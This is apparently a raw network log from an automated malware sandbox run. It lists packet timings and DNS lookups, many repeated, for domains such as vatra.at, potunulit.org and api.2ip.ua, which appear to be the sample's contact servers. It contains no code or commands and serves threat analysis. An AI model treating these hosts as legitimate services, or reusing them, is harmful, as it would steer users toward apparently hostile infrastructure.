                                                                                                                                                                                    Jan 5, 2023 08:58:45.629643917 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.629667997 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.629715919 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.629722118 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.629744053 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.629774094 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.630454063 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.630479097 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.630498886 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.630518913 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.630532980 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.630558014 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.631262064 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.631323099 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.631342888 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.631362915 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.631376028 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.631409883 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632055044 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632082939 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632102013 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632122040 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632124901 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632149935 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632934093 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632961035 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632980108 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.632999897 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.633013010 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.633045912 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.633888006 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.633933067 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.633951902 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.633970976 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.633991003 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.634036064 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.634706974 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.634732008 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.634768963 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665646076 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665678024 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665699005 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665776968 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665818930 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665888071 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665909052 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665956974 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.665978909 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.666245937 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.666268110 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.666287899 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.666306973 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.666316986 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.666348934 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667095900 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667123079 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667144060 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667191029 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667211056 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667866945 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667895079 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667915106 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667934895 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667953968 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.667989016 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.668015957 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.668754101 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.668782949 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.668802977 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.668823957 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.668845892 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.668884993 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.669512987 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.669538975 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.669558048 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.669573069 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.669580936 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.669615030 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.670351028 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.670381069 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.670399904 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.670413971 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.670420885 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.670453072 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.671154022 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.671184063 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.671204090 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.671222925 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.671253920 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.671283960 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.672018051 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.672039032 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.672059059 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.672096014 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.672112942 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 5, 2023 08:58:20.679403067 CET192.168.2.48.8.8.80x1abcStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:26.848495960 CET192.168.2.48.8.8.80x6cf5Standard query (0)polyzi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:30.710412979 CET192.168.2.48.8.8.80x99afStandard query (0)lazydowns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:35.208450079 CET192.168.2.48.8.8.80x602cStandard query (0)lazydowns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:45.173271894 CET192.168.2.48.8.8.80xc24fStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:50.986901045 CET192.168.2.48.8.8.80xfe79Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:50.987091064 CET192.168.2.48.8.8.80x7ff5Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.266298056 CET192.168.2.48.8.8.80x84aStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:53.473265886 CET192.168.2.48.8.8.80x1abeStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:53.689752102 CET192.168.2.48.8.8.80x68b9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.826666117 CET192.168.2.48.8.8.80xe73fStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.613182068 CET192.168.2.48.8.8.80x9870Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.933881044 CET192.168.2.48.8.8.80xa90dStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.140023947 CET192.168.2.48.8.8.80xfe5Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:15.624846935 CET192.168.2.48.8.8.80x56a7Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:17.869410038 CET192.168.2.48.8.8.80x287cStandard query (0)degroeneuitzender.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.454637051 CET192.168.2.48.8.8.80xb3c5Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.627986908 CET192.168.2.48.8.8.80x6901Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:23.946429014 CET192.168.2.48.8.8.80x80caStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:24.905560970 CET192.168.2.48.8.8.80x5ef2Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:26.059067965 CET192.168.2.48.8.8.80xe7abStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:27.760394096 CET192.168.2.48.8.8.80xd9d9Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:28.630048990 CET192.168.2.48.8.8.80xf8c3Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:30.538481951 CET192.168.2.48.8.8.80x558dStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:31.699796915 CET192.168.2.48.8.8.80x4303Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:32.922259092 CET192.168.2.48.8.8.80x37d2Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:34.101764917 CET192.168.2.48.8.8.80xdc34Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:40.994484901 CET192.168.2.48.8.8.80x9b1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:57.410024881 CET192.168.2.48.8.8.80x6671Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:57.455600023 CET192.168.2.48.8.8.80x1312Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 09:01:02.837246895 CET192.168.2.48.8.8.80xc334Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 5, 2023 08:58:20.730437040 CET8.8.8.8192.168.2.40x1abcNo error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:20.730437040 CET8.8.8.8192.168.2.40x1abcNo error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:26.895623922 CET8.8.8.8192.168.2.40x6cf5No error (0)polyzi.com95.217.49.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:30.730123043 CET8.8.8.8192.168.2.40x99afNo error (0)lazydowns.com68.65.123.54A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:35.229505062 CET8.8.8.8192.168.2.40x602cNo error (0)lazydowns.com68.65.123.54A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:45.233628035 CET8.8.8.8192.168.2.40xc24fNo error (0)potunulit.org188.114.97.9A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:45.233628035 CET8.8.8.8192.168.2.40xc24fNo error (0)potunulit.org188.114.96.9A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:51.004692078 CET8.8.8.8192.168.2.40xfe79No error (0)accounts.google.com142.251.209.13A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:51.014624119 CET8.8.8.8192.168.2.40x7ff5No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:51.014624119 CET8.8.8.8192.168.2.40x7ff5No error (0)clients.l.google.com142.250.184.78A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.280337095 CET8.8.8.8192.168.2.40x3d1aNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.280337095 CET8.8.8.8192.168.2.40x3d1aNo error (0)shed.dual-low.part-0032.t-0009.fdv2-t-msedge.netpart-0032.t-0009.fdv2-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.280337095 CET8.8.8.8192.168.2.40x3d1aNo error (0)part-0032.t-0009.fdv2-t-msedge.net13.107.237.60A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.280337095 CET8.8.8.8192.168.2.40x3d1aNo error (0)part-0032.t-0009.fdv2-t-msedge.net13.107.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.288417101 CET8.8.8.8192.168.2.40x84aNo error (0)js.monitor.azure.comaijscdn2.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.288417101 CET8.8.8.8192.168.2.40x84aNo error (0)shed.dual-low.part-0032.t-0009.fdv2-t-msedge.netpart-0032.t-0009.fdv2-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.288417101 CET8.8.8.8192.168.2.40x84aNo error (0)part-0032.t-0009.fdv2-t-msedge.net13.107.237.60A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:52.288417101 CET8.8.8.8192.168.2.40x84aNo error (0)part-0032.t-0009.fdv2-t-msedge.net13.107.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:53.491018057 CET8.8.8.8192.168.2.40x1abeNo error (0)www.google.com142.250.184.36A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:58:53.706526041 CET8.8.8.8192.168.2.40x68b9No error (0)www.google.com142.250.184.36A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:08.844626904 CET8.8.8.8192.168.2.40xe73fNo error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:10.876104116 CET8.8.8.8192.168.2.40x9870No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:11.953619957 CET8.8.8.8192.168.2.40xa90dNo error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:14.657761097 CET8.8.8.8192.168.2.40xfe5No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:16.135411978 CET8.8.8.8192.168.2.40x56a7No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:17.905997038 CET8.8.8.8192.168.2.40x287cNo error (0)degroeneuitzender.nl5.135.247.111A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at200.46.66.71A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at185.95.186.58A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at109.102.255.230A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:21.474004030 CET8.8.8.8192.168.2.40xb3c5No error (0)vatra.at211.53.230.67A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 5, 2023 08:59:22.647756100 CET8.8.8.8192.168.2.40x6901No error (0)vatra.at211.40.39.251A (IP address)IN (0x0001)false
